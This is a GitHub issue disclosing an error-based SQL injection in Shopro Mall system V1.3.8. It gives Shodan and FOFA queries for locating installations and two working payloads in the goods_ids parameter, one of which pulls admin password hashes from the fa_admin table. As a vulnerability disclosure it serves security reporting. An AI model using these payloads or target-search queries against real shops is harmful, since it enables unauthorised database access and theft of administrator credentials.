Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There‘s SQL injection in Shopro Mall system V1.3.8 #16

Open
secf0ra11 opened this issue Aug 8, 2022 · 0 comments
Open

There‘s SQL injection in Shopro Mall system V1.3.8 #16

secf0ra11 opened this issue Aug 8, 2022 · 0 comments

Comments

@secf0ra11
Copy link

Shopro Mall system V1.3.8 Value parameter has SQL injection

Shopro Mall system

Official Website:https://shopro.top
Github:https://github.com/ITmonkey-cn/shopro.git

Search

shodan:http.title:"shopro"
fofa:title="shopro"

Vulnerability Type

Error-Based SQL Injection

Vulnerability Version

V1.3.8

Recurring environment:

  • ubuntu
  • python3.7

Vulnerability Description AND recurrence

  1. F12 find something interesting

  2. parameter goods_ids has sql error message

    http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
    
  3. Find information whit Error-Based SQL Injection

    http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select group_concat(password) from fa_admin),0x7e),1)-- -
    

Ref

https://github.com/secf0ra11/secf0ra11.github.io/blob/main/Shopro_SQL_injection.md

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant